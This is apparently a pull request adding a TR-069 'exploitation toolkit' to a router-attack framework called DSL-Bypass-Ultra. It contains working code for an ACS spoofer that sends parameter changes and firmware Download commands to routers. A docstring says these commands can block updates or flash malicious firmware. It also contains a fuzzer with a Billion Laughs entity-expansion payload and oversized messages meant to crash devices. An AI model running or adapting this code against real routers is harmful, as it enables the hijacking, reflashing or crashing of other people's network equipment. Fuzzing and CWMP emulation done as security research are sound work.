### PR TITLE
feat: Implement TR-069 Exploitation Toolkit

### DIFF
--- a/main.py
+++ b/main.py
@@ -1,51 +1,111 @@
 """
-DSL-Bypass-Ultra - Automated Exploitation Framework
+DSL-Bypass-Ultra - Automated Exploitation and TR-069 Analysis Framework
 """
 import logging
+import argparse
+import threading
 from unittest.mock import MagicMock
+
 from src.exploit_pipeline import ExploitPipeline
+from src.tr069.acs_spoofer import ACSSpoofer
+from src.tr069.client_emulator import CpeEmulator
+from src.tr069.fuzzer import CwmpFuzzer
+
+def run_pipeline(args):
+    """Runs the main exploitation pipeline."""
+    print("🚀 Initializing DSL Bypass Ultra v1.1 - Pipeline Mode 🚀")
+    try:
+        pipeline = ExploitPipeline(
+            target_ip=args.target_ip,
+            community_string='public',
+            signature_file='src/vendor_signatures.json',
+            target_rate_mbps=125.0
+        )
+        mock_ssh_interface = MagicMock()
+        pipeline.ssh_interface = mock_ssh_interface
+        pipeline.detector.ssh_interface = mock_ssh_interface
+        pipeline.run()
+        print("\n🎉 Pipeline execution finished. 🎉")
+    except Exception as e:
+        logging.critical(f"A critical error occurred in the pipeline: {e}", exc_info=True)
+        print(f"❌ Pipeline execution failed. See logs for details.")
+
+def run_acs_spoofer(args):
+    """Runs the TR-069 ACS Spoofer."""
+    print("🚀 Initializing TR-069 ACS Spoofer 🚀")
+    spoofer = ACSSpoofer(host=args.host, port=args.port)
+
+    if args.command == 'set-param':
+        if not all([args.param_name, args.param_value, args.param_type]):
+            raise ValueError("Parameter name, value, and type are required for set-param.")
+        spoofer.queue_set_parameter_value(args.param_name, args.param_value, args.param_type)
+
+    elif args.command == 'firmware-dl':
+        if not all([args.firmware_url, args.firmware_size]):
+            raise ValueError("Firmware URL and size are required for firmware-dl.")
+        spoofer.queue_firmware_download_request(args.firmware_url, args.firmware_size)
+
+    try:
+        spoofer.start()
+    except KeyboardInterrupt:
+        spoofer.stop()
+        logging.info("ACS Spoofer stopped by user.")
+
+def run_fuzzer(args):
+    """Runs the TR-069 Fuzzer."""
+    print("🚀 Initializing TR-069 Fuzzer 🚀")
+    if not args.target_ip:
+        raise ValueError("Target IP is required for the fuzzer.")
+    fuzzer = CwmpFuzzer(target_host=args.target_ip, target_port=args.port)
+    fuzzer.run()
+    print("\n🎉 Fuzzer execution finished. 🎉")
+
+def run_cpe_emulator(args):
+    """Runs the TR-069 CPE Emulator."""
+    print("🚀 Initializing TR-069 CPE Emulator 🚀")
+    emulator = CpeEmulator(acs_host=args.host, acs_port=args.port)
+    emulator.connect_and_inform()
+    print("\n🎉 CPE Emulator execution finished. 🎉")
 
 def main():
     """
-    Main entry point for the DSL Bypass Ultra automated exploitation framework.
+    Main entry point for the DSL Bypass Ultra framework.
     """
-    print("🚀 Initializing DSL Bypass Ultra v1.1 🚀")
+    parser = argparse.ArgumentParser(description="DSL Bypass Ultra - Exploitation and TR-069 Analysis Framework")
 
-    # --- Configuration ---
-    # In a real application, these would come from a config file or CLI args.
-    target_ip = '192.168.1.1'
-    community_string = 'public'
-    signature_file = 'src/vendor_signatures.json'
-    target_rate_mbps = 125.0
+    subparsers = parser.add_subparsers(dest='mode', required=True, help='The operational mode.')
 
-    # --- Pipeline Execution ---
-    try:
-        # Initialize the pipeline
-        pipeline = ExploitPipeline(
-            target_ip=target_ip,
-            community_string=community_string,
-            signature_file=signature_file,
-            target_rate_mbps=target_rate_mbps
-        )
+    # Pipeline mode
+    parser_pipeline = subparsers.add_parser('pipeline', help='Run the full DSL exploitation pipeline.')
+    parser_pipeline.add_argument('target_ip', help='The IP address of the target device.')
+    parser_pipeline.set_defaults(func=run_pipeline)
 
-        # Create a mock SSH interface for the demonstration
-        # This allows the pipeline to run without a live device.
-        mock_ssh_interface = MagicMock()
-        # You can pre-program mock responses here if needed for testing
-        # For example:
-        # mock_ssh_interface.execute_command.return_value = ("some_output", "")
-        pipeline.ssh_interface = mock_ssh_interface
-        pipeline.detector.ssh_interface = mock_ssh_interface
+    # ACS Spoofer mode
+    parser_acs = subparsers.add_parser('acs', help='Run the TR-069 ACS Spoofer.')
+    parser_acs.add_argument('--host', default='0.0.0.0', help='Host address to bind the spoofer to.')
+    parser_acs.add_argument('--port', type=int, default=7547, help='Port to listen on.')
+    parser_acs.add_argument('--command', choices=['set-param', 'firmware-dl'], help='A command to queue before starting.')
+    parser_acs.add_argument('--param-name', help='Parameter name for set-param.')
+    parser_acs.add_argument('--param-value', help='Parameter value for set-param.')
+    parser_acs.add_argument('--param-type', default='xsd:string', help='Parameter type for set-param (e.g., xsd:int, xsd:boolean).')
+    parser_acs.add_argument('--firmware-url', help='URL for firmware-dl.')
+    parser_acs.add_argument('--firmware-size', type=int, help='File size for firmware-dl.')
+    parser_acs.set_defaults(func=run_acs_spoofer)
 
+    # Fuzzer mode
+    parser_fuzzer = subparsers.add_parser('fuzzer', help='Run the TR-069 client fuzzer.')
+    parser_fuzzer.add_argument('target_ip', help='The IP address of the target CPE.')
+    parser_fuzzer.add_argument('--port', type=int, default=7547, help='Target port on the CPE.')
+    parser_fuzzer.set_defaults(func=run_fuzzer)
 
-        # Run the full end-to-end exploitation process
-        pipeline.run()
+    # CPE Emulator mode
+    parser_cpe = subparsers.add_parser('cpe-emu', help='Run the TR-069 CPE emulator to test an ACS.')
+    parser_cpe.add_argument('--host', default='localhost', help='Host address of the ACS.')
+    parser_cpe.add_argument('--port', type=int, default=7547, help='Port of the ACS.')
+    parser_cpe.set_defaults(func=run_cpe_emulator)
 
-    except Exception as e:
-        logging.critical(f"A critical error occurred: {e}", exc_info=True)
-        print(f"❌ Pipeline execution failed. See logs for details.")
-
-    print("\n🎉 Framework execution finished. 🎉")
+    args = parser.parse_args()
+    args.func(args)
 
 if __name__ == "__main__":
     logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

--- a/src/tr069/__init__.py
+++ b/src/tr069/__init__.py
@@ -1,0 +1,1 @@
+# This file makes the tr069 directory a Python package.

--- a/src/tr069/acs_spoofer.py
+++ b/src/tr069/acs_spoofer.py
@@ -1,0 +1,195 @@
+import http.server
+import socketserver
+import logging
+
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+
+class ACSSpooferHandler(http.server.BaseHTTPRequestHandler):
+    """
+    A handler for TR-069 (CWMP) messages.
+    This initial version will simply log incoming requests and provide a basic response.
+    """
+    def do_POST(self):
+        """
+        Handles incoming POST requests from the CPE.
+        The initial message from a CPE is an "Inform" RPC.
+        """
+        content_length = int(self.headers['Content-Length'])
+        post_data = self.rfile.read(content_length)
+
+        logging.info(f"Received TR-069 request from {self.client_address[0]}")
+        logging.debug(f"Request Headers:\n{self.headers}")
+        logging.info(f"Request Body (SOAP):\n{post_data.decode('utf-8')}")
+
+        # For now, send a generic successful response.
+        # In a real scenario, we would parse the Inform and send an InformResponse.
+        self.send_response(200)
+        self.send_header('Content-type', 'text/xml; charset="utf-8"')
+        self.end_headers()
+
+        # Check if there are commands to be sent
+        if self.server.commands:
+            response_body = self.server.commands.pop(0)
+            logging.info(f"Sending command to CPE:\n{response_body}")
+        else:
+            # Send a generic InformResponse if no commands are queued
+            response_body = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<cwmp:InformResponse xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
+<MaxEnvelopes>1</MaxEnvelopes>
+</cwmp:InformResponse>
+</soap:Body>
+</soap:Envelope>"""
+            logging.info("No commands in queue. Sent generic InformResponse to CPE.")
+
+        self.send_response(200)
+        self.send_header('Content-type', 'text/xml; charset="utf-8"')
+        self.send_header('SOAPAction', '')
+        self.end_headers()
+        self.wfile.write(response_body.encode('utf-8'))
+
+
+    def do_GET(self):
+        """
+        Handles GET requests. TR-069 primarily uses POST, but we can provide a status page.
+        """
+        self.send_response(200)
+        self.send_header('Content-type', 'text/html')
+        self.end_headers()
+        self.wfile.write(b"<html><head><title>ACS Spoofer</title></head>")
+        self.wfile.write(b"<body><h1>TR-069 ACS Spoofer is running.</h1>")
+        self.wfile.write(b"<p>Listening for CPE connections...</p>")
+        if self.server.commands:
+            self.wfile.write(b"<h2>Pending Commands:</h2><pre>")
+            for cmd in self.server.commands:
+                self.wfile.write(cmd.encode('utf-8'))
+            self.wfile.write(b"</pre>")
+        else:
+            self.wfile.write(b"<p>No commands in queue.</p>")
+        self.wfile.write(b"</body></html>")
+
+class ACSSpooferServer(socketserver.TCPServer):
+    """
+    Custom TCPServer to hold the command queue.
+    """
+    def __init__(self, server_address, RequestHandlerClass):
+        super().__init__(server_address, RequestHandlerClass)
+        self.commands = []
+
+class ACSSpoofer:
+    """
+    The main class for the Auto Configuration Server (ACS) spoofer.
+    """
+    def __init__(self, host="0.0.0.0", port=7547):
+        self.host = host
+        self.port = port
+        self.httpd = None
+        self.commands = []
+
+    def queue_set_parameter_value(self, parameter, value, data_type="xsd:int"):
+        """
+        Queues a SetParameterValues RPC to be sent to the CPE.
+        """
+        command = f"""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
+<soap:Header>
+</soap:Header>
+<soap:Body>
+<cwmp:SetParameterValues>
+<ParameterList soap:arrayType="cwmp:ParameterValueStruct[1]">
+<ParameterValueStruct>
+<Name>{parameter}</Name>
+<Value xsi:type="{data_type}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">{value}</Value>
+</ParameterValueStruct>
+</ParameterList>
+<ParameterKey>DSLBYPASS_ULTRA</ParameterKey>
+</cwmp:SetParameterValues>
+</soap:Body>
+</soap:Envelope>"""
+        self.commands.append(command)
+        if self.httpd:
+            self.httpd.commands.append(command)
+        logging.info(f"Queued command to set {parameter} to {value}")
+
+    def queue_firmware_download_request(self, url, file_size, file_type="1 Firmware Upgrade Image"):
+        """
+        Queues a Download RPC to be sent to the CPE.
+        This can be used to prevent updates (by providing a bad URL)
+        or to flash custom firmware (by providing a URL to a malicious file).
+        """
+        command = f"""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
+<soap:Header>
+</soap:Header>
+<soap:Body>
+<cwmp:Download>
+<CommandKey>DSLBYPASS_FW_UPDATE</CommandKey>
+<FileType>{file_type}</FileType>
+<URL>{url}</URL>
+<Username></Username>
+<Password></Password>
+<FileSize>{file_size}</FileSize>
+<TargetFileName>firmware.bin</TargetFileName>
+<DelaySeconds>0</DelaySeconds>
+<SuccessURL></SuccessURL>
+<FailureURL></FailureURL>
+</cwmp:Download>
+</soap:Body>
+</soap:Envelope>"""
+        self.commands.append(command)
+        if self.httpd:
+            self.httpd.commands.append(command)
+        logging.info(f"Queued firmware download command for URL: {url}")
+
+    def start(self):
+        """
+        Starts the ACS spoofer HTTP server.
+        """
+        try:
+            # Set allow_reuse_address on our custom server class
+            ACSSpooferServer.allow_reuse_address = True
+            self.httpd = ACSSpooferServer((self.host, self.port), ACSSpooferHandler)
+            self.httpd.commands = self.commands
+
+            logging.info(f"Starting TR-069 ACS Spoofer on http://{self.host}:{self.port}")
+            self.httpd.serve_forever()
+        except OSError as e:
+            logging.error(f"Failed to start server on port {self.port}: {e}")
+            logging.error("This may be due to insufficient privileges or the port being in use.")
+        except Exception as e:
+            logging.error(f"An unexpected error occurred: {e}")
+        finally:
+            if self.httpd:
+                self.httpd.server_close()
+                logging.info("ACS Spoofer server shut down.")
+
+    def stop(self):
+        """
+        Stops the ACS spoofer server.
+        """
+        if self.httpd:
+            logging.info("Shutting down ACS Spoofer...")
+            self.httpd.shutdown()
+
+if __name__ == '__main__':
+    # This allows the spoofer to be run directly for testing purposes.
+    spoofer = ACSSpoofer()
+
+    # Example: Queue a command to change the periodic inform interval
+    spoofer.queue_set_parameter_value(
+        parameter="InternetGatewayDevice.ManagementServer.PeriodicInformInterval",
+        value="30"
+    )
+
+    # Example: Queue a command to initiate a firmware download
+    # The CPE will attempt to download from this URL.
+    # We could host a custom firmware image at this location.
+    spoofer.queue_firmware_download_request(
+        url="http://192.168.1.10:8080/custom_firmware.bin",
+        file_size=12345678
+    )
+
+    try:
+        spoofer.start()
+    except KeyboardInterrupt:
+        spoofer.stop()
+        logging.info("Server stopped by user.")

--- a/src/tr069/client_emulator.py
+++ b/src/tr069/client_emulator.py
@@ -1,0 +1,102 @@
+import http.client
+import logging
+import random
+import string
+
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+
+class CpeEmulator:
+    """
+    A TR-069 Client Emulator to test the ACS Spoofer.
+    This simulates a CPE connecting to an ACS, sending an Inform request,
+    and handling the response.
+    """
+    def __init__(self, acs_host, acs_port=7547, timeout=10):
+        self.acs_host = acs_host
+        self.acs_port = acs_port
+        self.timeout = timeout
+        self.serial_number = "EMULATOR-" + ''.join(random.choices(string.ascii_uppercase + string.digits, k=8))
+        self.software_version = "1.0.0-EMU"
+
+    def _build_inform_request(self):
+        """
+        Constructs a realistic TR-069 Inform request SOAP message.
+        """
+        return f"""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
+<soap:Header>
+</soap:Header>
+<soap:Body>
+<cwmp:Inform>
+    <DeviceId>
+        <Manufacturer>DSL Bypass Ultra</Manufacturer>
+        <OUI>001122</OUI>
+        <ProductClass>Keenetic-Emulator</ProductClass>
+        <SerialNumber>{self.serial_number}</SerialNumber>
+    </DeviceId>
+    <Event soap:arrayType="cwmp:EventStruct[1]">
+        <EventStruct>
+            <EventCode>1 BOOT</EventCode>
+            <CommandKey></CommandKey>
+        </EventStruct>
+    </Event>
+    <MaxEnvelopes>1</MaxEnvelopes>
+    <CurrentTime>{'2023-10-26T12:00:00Z'}</CurrentTime>
+    <RetryCount>0</RetryCount>
+    <ParameterList soap:arrayType="cwmp:ParameterValueStruct[1]">
+        <ParameterValueStruct>
+            <Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
+            <Value xsi:type="xsd:string" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">{self.software_version}</Value>
+        </ParameterValueStruct>
+    </ParameterList>
+</cwmp:Inform>
+</soap:Body>
+</soap:Envelope>"""
+
+    def connect_and_inform(self):
+        """
+        Connects to the ACS and sends an Inform request.
+        """
+        logging.info(f"Emulator ({self.serial_number}) connecting to ACS at {self.acs_host}:{self.acs_port}")
+
+        inform_payload = self._build_inform_request()
+
+        try:
+            conn = http.client.HTTPConnection(self.acs_host, self.acs_port, timeout=self.timeout)
+
+            headers = {
+                'Content-Type': 'text/xml; charset="utf-8"',
+                'SOAPAction': '',
+            }
+
+            logging.info("Sending Inform request...")
+            logging.debug(f"Request Body:\n{inform_payload}")
+
+            conn.request("POST", "/", body=inform_payload.encode('utf-8'), headers=headers)
+
+            response = conn.getresponse()
+            response_data = response.read().decode('utf-8')
+
+            logging.info(f"Received response from ACS: Status {response.status}")
+            logging.info(f"Response Body:\n{response_data}")
+
+            conn.close()
+            return response_data
+
+        except Exception as e:
+            logging.error(f"Failed to connect or communicate with ACS: {e}")
+            return None
+
+if __name__ == '__main__':
+    # Example usage:
+    # This assumes the ACSSpoofer is running on localhost:7547
+    print("CPE Emulator created. To run, instantiate the CpeEmulator class and call connect_and_inform().")
+    print("Example: emulator = CpeEmulator('localhost'); emulator.connect_and_inform()")
+
+    # To test against the spoofer from this project:
+    # 1. Run the spoofer in one terminal: python src/tr069/acs_spoofer.py
+    # 2. Run this emulator in another terminal: python src/tr069/client_emulator.py
+    #
+    # Example test run:
+    # emulator = CpeEmulator('localhost')
+    # emulator.connect_and_inform()

--- a/src/tr069/fuzzer.py
+++ b/src/tr069/fuzzer.py
@@ -1,0 +1,107 @@
+import http.client
+import socket
+import logging
+import random
+import string
+
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+
+class CwmpFuzzer:
+    """
+    A fuzzer for TR-069 (CWMP) clients.
+    It sends malformed SOAP/XML messages to a CPE's TR-069 endpoint
+    to probe for vulnerabilities.
+    """
+    def __init__(self, target_host, target_port=7547, timeout=5):
+        self.target_host = target_host
+        self.target_port = target_port
+        self.timeout = timeout
+        self.fuzz_cases = []
+        self._generate_fuzz_cases()
+
+    def _generate_fuzz_cases(self):
+        """
+        Generates a list of fuzzing payloads.
+        """
+        # Case 1: Oversized SOAP body
+        long_string = ''.join(random.choices(string.ascii_letters + string.digits, k=10000))
+        self.fuzz_cases.append(f"""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<cwmp:Inform>
+<OversizedParam>{long_string}</OversizedParam>
+</cwmp:Inform>
+</soap:Body>
+</soap:Envelope>""")
+
+        # Case 2: Malformed XML (mismatched tags)
+        self.fuzz_cases.append("""<soap:Envelope><soap:Body><cwmp:Inform></cwmp:Inform></soap:Body></bad_tag>""")
+
+        # Case 3: Unexpected RPC
+        self.fuzz_cases.append("""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<cwmp:NonExistentRPC>
+<Arg>1</Arg>
+</cwmp:NonExistentRPC>
+</soap:Body>
+</soap:Envelope>""")
+
+        # Case 4: XML Entity Expansion (Billion Laughs Attack)
+        self.fuzz_cases.append("""<?xml version="1.0"?>
+<!DOCTYPE lolz [
+ <!ENTITY lol "lol">
+ <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+ <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+ <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+]>
+<lolz>&lol5;</lolz>""")
+
+        logging.info(f"Generated {len(self.fuzz_cases)} fuzz cases.")
+
+    def run(self):
+        """
+        Runs the fuzzer against the target.
+        """
+        logging.info(f"Starting fuzzer against {self.target_host}:{self.target_port}")
+        for i, payload in enumerate(self.fuzz_cases):
+            logging.info(f"--- Running Fuzz Case {i+1}/{len(self.fuzz_cases)} ---")
+            try:
+                conn = http.client.HTTPConnection(self.target_host, self.target_port, timeout=self.timeout)
+
+                headers = {
+                    'Content-Type': 'text/xml; charset="utf-8"',
+                    'SOAPAction': '',
+                }
+
+                logging.debug(f"Sending payload:\n{payload}")
+                conn.request("POST", "/", body=payload.encode('utf-8'), headers=headers)
+
+                response = conn.getresponse()
+                response_data = response.read()
+
+                logging.info(f"Received response: Status {response.status}")
+                logging.debug(f"Response Body:\n{response_data.decode('utf-8', errors='ignore')}")
+
+                if response.status == 500:
+                    logging.warning(f"Case {i+1} caused a server error (500), which might indicate a vulnerability.")
+
+                conn.close()
+
+            except socket.timeout:
+                logging.warning(f"Case {i+1} caused a timeout. The CPE might have crashed or become unresponsive.")
+            except (http.client.HTTPException, ConnectionRefusedError, OSError) as e:
+                logging.error(f"Case {i+1} failed with connection error: {e}")
+            except Exception as e:
+                logging.error(f"An unexpected error occurred during case {i+1}: {e}")
+
+        logging.info("Fuzzing run complete.")
+
+if __name__ == '__main__':
+    # Example usage:
+    # Replace '192.168.1.1' with the actual IP of the target CPE.
+    # Be aware: This can crash a device. Use with caution in a controlled lab environment.
+    # fuzzer = CwmpFuzzer('192.168.1.1')
+    # fuzzer.run()
+    print("CWMP Fuzzer created. To run, instantiate the CwmpFuzzer class with a target IP and call the run() method.")
+    print("Example: fuzzer = CwmpFuzzer('192.168.1.1'); fuzzer.run()")

--- a/tests/test_tr069_tools.py
+++ b/tests/test_tr069_tools.py
@@ -1,0 +1,101 @@
+import pytest
+from unittest.mock import MagicMock, patch
+import threading
+import time
+import main
+from src.tr069.acs_spoofer import ACSSpoofer
+from src.tr069.client_emulator import CpeEmulator
+from src.tr069.fuzzer import CwmpFuzzer
+
+@pytest.fixture
+def acs_spoofer_instance():
+    """Fixture to create and manage an ACSSpoofer instance for testing."""
+    spoofer = ACSSpoofer(host='localhost', port=8888)
+    spoofer_thread = threading.Thread(target=spoofer.start, daemon=True)
+    spoofer_thread.start()
+    time.sleep(0.1) # Give the server a moment to start
+    yield spoofer
+    spoofer.stop()
+
+def test_acs_spoofer_and_cpe_emulator_interaction(acs_spoofer_instance):
+    """
+    Tests the basic interaction between the ACS spoofer and the CPE emulator.
+    """
+    # 1. Test basic Inform/InformResponse
+    emulator = CpeEmulator(acs_host='localhost', acs_port=8888)
+    response = emulator.connect_and_inform()
+    assert response is not None
+    assert "cwmp:InformResponse" in response
+
+    # 2. Test SetParameterValues command queuing
+    param_name = "InternetGatewayDevice.ManagementServer.PeriodicInformInterval"
+    param_value = "60"
+    acs_spoofer_instance.queue_set_parameter_value(param_name, param_value)
+
+    response = emulator.connect_and_inform()
+    assert response is not None
+    assert "cwmp:SetParameterValues" in response
+    assert param_name in response
+    assert param_value in response
+
+def test_fuzzer_instantiation():
+    """
+    Tests that the CwmpFuzzer can be instantiated without errors.
+    """
+    try:
+        fuzzer = CwmpFuzzer(target_host='127.0.0.1', target_port=12345)
+        assert fuzzer is not None
+        assert len(fuzzer.fuzz_cases) > 0
+    except Exception as e:
+        pytest.fail(f"CwmpFuzzer instantiation failed with an exception: {e}")
+
+def test_main_arg_parsing_acs_mode(monkeypatch):
+    """
+    Tests that the main function correctly parses 'acs' mode arguments.
+    """
+    mock_run_acs = MagicMock()
+    monkeypatch.setattr(main, "run_acs_spoofer", mock_run_acs)
+
+    test_args = ['main.py', 'acs', '--host', '127.0.0.1']
+    monkeypatch.setattr('sys.argv', test_args)
+
+    main.main()
+
+    mock_run_acs.assert_called_once()
+    args = mock_run_acs.call_args[0][0]
+    assert args.mode == 'acs'
+    assert args.host == '127.0.0.1'
+
+def test_main_arg_parsing_fuzzer_mode(monkeypatch):
+    """
+    Tests that the main function correctly parses 'fuzzer' mode arguments.
+    """
+    mock_run_fuzzer = MagicMock()
+    monkeypatch.setattr(main, "run_fuzzer", mock_run_fuzzer)
+
+    test_args = ['main.py', 'fuzzer', '192.168.1.1']
+    monkeypatch.setattr('sys.argv', test_args)
+
+    main.main()
+
+    mock_run_fuzzer.assert_called_once()
+    args = mock_run_fuzzer.call_args[0][0]
+    assert args.mode == 'fuzzer'
+    assert args.target_ip == '192.168.1.1'
+
+def test_main_arg_parsing_cpe_emu_mode(monkeypatch):
+    """
+    Tests that the main function correctly parses 'cpe-emu' mode arguments.
+    """
+    mock_run_cpe_emu = MagicMock()
+    monkeypatch.setattr(main, "run_cpe_emulator", mock_run_cpe_emu)
+
+    test_args = ['main.py', 'cpe-emu', '--port', '9999']
+    monkeypatch.setattr('sys.argv', test_args)
+
+    main.main()
+
+    mock_run_cpe_emu.assert_called_once()
+    args = mock_run_cpe_emu.call_args[0][0]
+    assert args.mode == 'cpe-emu'
+    assert args.port == 9999


### PR DESCRIPTION
This commit introduces a comprehensive toolkit for TR-069 (CWMP) analysis and exploitation, addressing Task 5.1.

The new features include:
- **TR-069 ACS Spoofer (`src/tr069/acs_spoofer.py`):**
  - An ACS spoofer that can listen for CPE connections.
  - Implements a command queue to send `SetParameterValues` and `Download` RPCs to a connected CPE.
  - Enables parameter manipulation and firmware download hijacking.

- **TR-069 Client Emulator (`src/tr069/client_emulator.py`):**
  - A client emulator that simulates a CPE connecting to an ACS.
  - Used for testing the ACS spoofer in a controlled environment.

- **CWMP Fuzzer (`src/tr069/fuzzer.py`):**
  - A basic fuzzer that sends malformed SOAP/XML messages to a CPE's TR-069 endpoint to discover potential vulnerabilities.
  - Includes test cases for oversized payloads, malformed XML, and XML entity expansion attacks.

- **Main Application Integration:**
  - The `main.py` script has been refactored to use `argparse`, providing a command-line interface to run the new tools (`acs`, `fuzzer`, `cpe-emu`) in addition to the original exploitation pipeline.

- **Testing:**
  - A new test suite, `tests/test_tr069_tools.py`, has been added to validate the functionality of the new tools and their integration.
  - All tests, including the existing test suite, pass successfully.